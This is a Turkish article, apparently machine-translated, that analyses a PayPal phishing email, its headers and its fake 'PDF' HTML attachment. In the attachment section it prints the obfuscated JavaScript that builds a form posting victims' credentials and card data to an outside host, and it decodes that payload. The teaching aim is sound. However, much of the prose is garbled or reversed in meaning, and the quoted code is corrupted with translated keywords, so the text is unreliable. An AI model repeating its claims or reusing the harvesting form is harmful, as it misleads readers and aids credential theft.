10Sep
Herkesin bilgisinin çevrimiçi olduğu günümüz dünyasında, kimlik avı, en popüler ve yıkıcı çevrimiçi saldırılardan biridir, çünkü her zaman bir virüsü temizleyebilirsiniz, ancak bankacılık bilgileriniz çalınırsa, başınız belada demektir.İşte böyle bir saldırının bir dökümünü aldık.
Bunun sadece bankacılık bilgilerinizin önemli olduğunu düşünmeyin: Sonuçta, birisi hesap giriş bilgilerinizi kontrol altına alırsa, yalnızca o hesapta bulunan bilgiyi değil, aynı oturum açma bilgisinin çeşitlidiğer hesaplar. Ve e-posta hesabınızdan ödün vermeleri durumunda diğer tüm şifrelerini sıfırlayabilirler.
Dolayısıyla, güçlü ve değişen şifreleri tutmanın yanı sıra, sahte e-postalar gerçek şey gibi maskelenmiş olarak daima tetikte olmalısınız.Çoğu phishing denemesi amatörce iken, bazıları oldukça inandırıcıdır, bu yüzden kaputun altında nasıl çalıştığı gibi yüzey seviyesinde de tanımanın önemini kavramak önemlidir.
Asirap ile resim
Plain Sight'da Neyin İncelenmesi
Örnek e-postalar, çoğu kimlik avı denemesi gibi, PayPal hesabınızdaki faaliyetleri "normal koşullar altında endişe verici" olarak "bilgilendirir".Dolayısıyla, harekete geçirici mesaj, aklınıza gelebilecek her kişisel bilgiyi göndererek hesabınızı doğrulamak / geri yüklemektir. Yine, bu oldukça formüle.
Kesinlikle istisnalar olmasına rağmen hemen her mesajlaşma ve aldatmaca e-postasına doğrudan mesajın kendisinde kırmızı bayraklar yüklenir. Metin ikna edici olsa bile, mesajın genelinde, mesajın okunaklı olmadığını gösteren birçok hata bulursunuz.
Mesaj Gövdesi
İlk bakışta, gördüğüm daha iyi kimlik avı e-postalardan biridir. Herhangi bir yazım hatası veya dilbilgisi hatası yoktur ve sözler, ne beklediğinize göre okur. Bununla birlikte, içeriği biraz daha yakından incelediğinizde görebileceğiniz birkaç kırmızı bayrak var.
- "Paypal" - Doğru durumda "PayPal"( sermaye P).Mesajda her iki varyasyonun da kullanıldığını görebilirsiniz.Şirketler markalaşma konusunda çok kayıtsızdır, bu yüzden böyle bir şey prova sürecini geçeceğinden şüphelidir.
- "ActiveX'e izin ver" - Paypal'ın yalnızca tek bir tarayıcıda çalışan, özellikle birden fazla tarayıcıyı desteklediği durumlarda çalışan özel bir bileşen kullandığı, yasal bir web tabanlı işi kaç kere gördünüz? Elbette, bir yerlerde bir şeyler yapıyor ama bu kırmızı bayrak.
- "güvenli". - Bu kelimenin, paragraf metninin geri kalanıyla birlikte boşlukta nasıl sıralandığına dikkat edin. Pencereyi biraz gerginlesem bile, düzgün sarılmıyor ya da boşluk bırakmıyor.
- "Paypal!" - Ünlem işaretinden önceki alan beceriksiz görünüyor. Emin olduğum başka bir ilavet, okunaklı bir e-postada olmazdı.
- "PayPal- Account Update Form.pdf.htm" - Paypal özellikle neden sadece bir sayfaya kendi sitesinde bağlantı kurabilecekleri bir "PDF" eklemiş olabilir? Ek olarak, neden bir HTML dosyasını bir PDF olarak gizlemeye çalışıyorlar? Bu, hepsinden daha büyük kırmızı bayrak.
Mesaj Başlığı
Mesaj başlığına bir göz attığınızda, birkaç daha fazla kırmızı bayrak görüntülenir:
- Kimden adresi [email protected]'dur.
- Adres adresi eksik. Bunu boşa çıkarmadım, basitçe standart ileti başlığının bir parçası değil. Genellikle adı olan bir şirket e-postayı sizin için kişiselleştirecektir.
Ataşman
Ataşeyi açtığımda, stil bilgisi eksik olduğu için düzenin doğru olmadığını hemen görebilirsiniz. Yine, neden sitede bir bağlantı verebilecekleri zaman PayPal e-postayla bir HTML formu oluşturur ki?
Not: bunun için Gmail'in dahili HTML ek görüntüleyicisini kullandık, ancak tarayıcılardan eklentileri AÇMAYINIZ.Asla. Hiç.Hesap bilgilerinizi çalmak için çoğu zaman bilgisayarınıza truva atları yükleyecek patlatmaları içerirler.
Aşağı doğru kaydırdığınızda, bu formun sadece PayPal giriş bilgilerimiz için değil bankacılık ve kredi kartı bilgileri için de istediğini görebilirsiniz. Bazı görüntüler kırılmış.
Bu phishing girişimi bir şeyle her şeyden sonra gidiyor.
Teknik Arıza
Bunun bir kimlik avı girişimi olduğu ortada net olana dayanacak olursak, şimdi, e-postanın teknik makinesini parçalayıp bulabileceğimiz şeyleri göreceğiz.
Ekten Bilgi
İlk göz atmanız gereken şey, veriyi sahte siteye gönderen eki formunun HTML kaynağıdır.
Kaynağı hızlı bir şekilde görüntülerken, her iki okunaklı olan ya "paypal.com" ya da "paypalobjects.com" ya işaret ettiğinden, tüm bağlantılar geçerli görünüyor.
Şimdi, Firefox'un sayfada toplanan bazı temel sayfa bilgilerini inceleyeceğiz.
Gördüğünüz gibi, bazı grafikler, yasal "PayPal" etki alanları yerine "blessedtobe.com", "goodhealthpharmacy.com" ve "pic-upload.de" etki alanlarından çekiliyor.
E-posta Üstbilgilerinden Bilgi
Sonra, çiğ e-posta mesajı başlıklarına bir göz atacağız. Gmail bunu mesajın orijinalini göster menüsü seçeneği aracılığıyla kullanılabilir hale getirir.
Orijinal mesajın üstbilgi bilgisine baktığınızda, bu mesajın Outlook Express 6 kullanılarak hazırlandığını görebilirsiniz. PayPal'ın bu mesajların her birini eski bir e-posta istemcisiyle manuel olarak gönderen birileri olduğundan şüpheliyim.
Şimdi, yönlendirme bilgisine bakarak hem gönderenin hem de aktarma posta sunucusunun IP adresini görebiliriz.
"Kullanıcı" IP adresi orijinal göndericidir. IP bilgilerine hızlı bir şekilde bakmakla, gönderen IP'nin Almanya'da olduğunu görebiliriz.
Geçiş yapan posta sunucusuna( mail.itak.at) baktığımızda bunun IP adresinin Avusturya'da bulunan bir ISS olduğunu görebiliyoruz. PayPal, bu görevi kolaylıkla halledebilecek büyük bir sunucu grubu olduğunda, Avusturya'daki bir İSS'den doğrudan e-postalarını yönlendiriyor.
Veriler Nereye Geçiyor?
Bunun neticesinde bunun bir kimlik avı e-postası olduğuna karar verdik ve mesajın nereden geldiğine ilişkin bazı bilgiler toplandı, ancak verilerinizin nereye gönderileceği hakkında ne oldu?
Bunu görmek için öncelikle HTM ekini masaüstümüzde kaydetmek ve bir metin düzenleyicisinde açmak zorundayız.Şüpheli görünen Javascript bloğuna gittiğimizde, her şey düzgün görünür.
Son Javascript bloğunun tam kaynağını ortaya çıkarıyor:
& lt; script language = "JavaScript" type = "text / javascript" & gt;
// Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x =”3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e”, y =”; için( i & lt; x.length i = 0 i + = 2){ y + = çıkış yapılmış( '%' + x.substr( i, 2));} document.write( y);
& lt; / script & gt;
Her ne zaman bir Javascript bloğuna gömülü görünüşte rasgele harfler ve sayılardan oluşan büyük bir karışık dizgeyi gördüğünüzde, genellikle şüpheli bir şeydir. Koda bakıldığında, "x" değişkeni bu büyük dize olarak ayarlanır ve daha sonra "y" değişkenine dönüştürülür. Değişken "y" nin nihai sonucu belgeye HTML olarak yazılır.
büyük dize yana sayılar 0-9 yapılır ve af harfler, büyük olasılıkla Hex dönüşüm için basit bir ASCII aracılığıyla kodlanmıştır:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
Karşılığı şudur:
& lt; form name =”main” id =”main”method = "posta" eylemi = "http: //www.dexposure.net/bbs/data/ doğrulama.php" & gt;
Bunun, sonuçları PayPal'a değil sahte bir siteye gönderen geçerli bir HTML form etiketine dönüştürdüğü tesadüf değildir.
Ayrıca, formun HTML kaynağını görüntülediğinizde, bu form etiketinin Javascript aracılığıyla dinamik olarak oluşturulduğu için görünür olmadığını göreceksiniz. Bu, birinin direkt olarak bir metin düzenleyicisinde açılmasını değil, yalnızca birinin eki( daha önce yapmış olduğumuz gibi) oluşturmasını görseydi HTML'nin aslında ne yaptığını gizlemek için akıllı bir yoldur.
Kusurlu site üzerinde hızlı bir Whois çalıştırdığınızda, bunun popüler bir web barındırıcısı olan 1and1'de barındırılan bir alan olduğunu görebiliriz.
Etki alanının okunabilir bir ad kullandığı( "dfh3sjhskjhw.net" gibi bir şeyin aksine) ve etki alanı 4 yıldır kayıt altına alınmış durumda. Bu nedenle, bu alan adının kaçırıldığını ve bu kimlik avı girişiminde bir piyon olarak kullanıldığını düşünüyorum.
Kinizm, İyi Bir Savundur
Çevrimiçi olarak güvence altına alınmaya gelince, hiçbir zaman kinizmden vazgeçmek hiç acıyor.
Eminim örnek e-postada daha fazla kırmızı bayrak var ancak yukarıda işaret ettiğimiz şey, birkaç dakika inceledikten sonra gördüğümüz göstergelerdir. Vikipedi, e-postanın yüzey seviyesi meşru muadili% 100 taklit ederse, teknik analiz hala gerçek doğasını açığa vuracaktır. Bu nedenle, hem görebileceğiniz, hem de göremediğiniz şeyleri inceleyebilmek için içe aktarılmaktadır.